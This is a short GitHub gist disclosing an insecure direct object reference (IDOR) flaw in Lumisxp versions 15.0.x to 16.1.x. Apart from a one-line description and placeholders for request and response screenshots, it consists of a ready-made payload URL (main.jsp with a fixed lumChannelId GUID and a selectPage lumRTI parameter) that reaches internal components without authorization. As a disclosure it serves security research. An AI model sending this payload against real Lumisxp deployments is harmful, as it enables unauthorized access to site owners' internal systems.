Skip to content

Instantly share code, notes, and snippets.

@rodnt

rodnt/idor-lumis.md

Last active June 12, 2024 14:53
Show Gist options
  • Save rodnt/f6b3a2ac875b8f13656063eefbfd9812 to your computer and use it in GitHub Desktop.
Save rodnt/f6b3a2ac875b8f13656063eefbfd9812 to your computer and use it in GitHub Desktop.
Download ZIP
IDOR Lumisxp 15.0.x <= 16.1.x
Raw
idor-lumis.md

Description

Lumisxp versions 15.0.x to 16.1.x contain a GUID that can be exploited to access internal components without authorization.

Payload

  • URL:

    /main.jsp?lumChannelId=00000000F00000000000000000000002&lumPageId=LumisBlankPage&lumRTI=lumis.service.doui.selectstructureelement.selectPage&pageId=

  • Request:

    Request Image

  • Response:

    Response Image 1

    Response Image 2

Author: Rodolfo Tavares

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment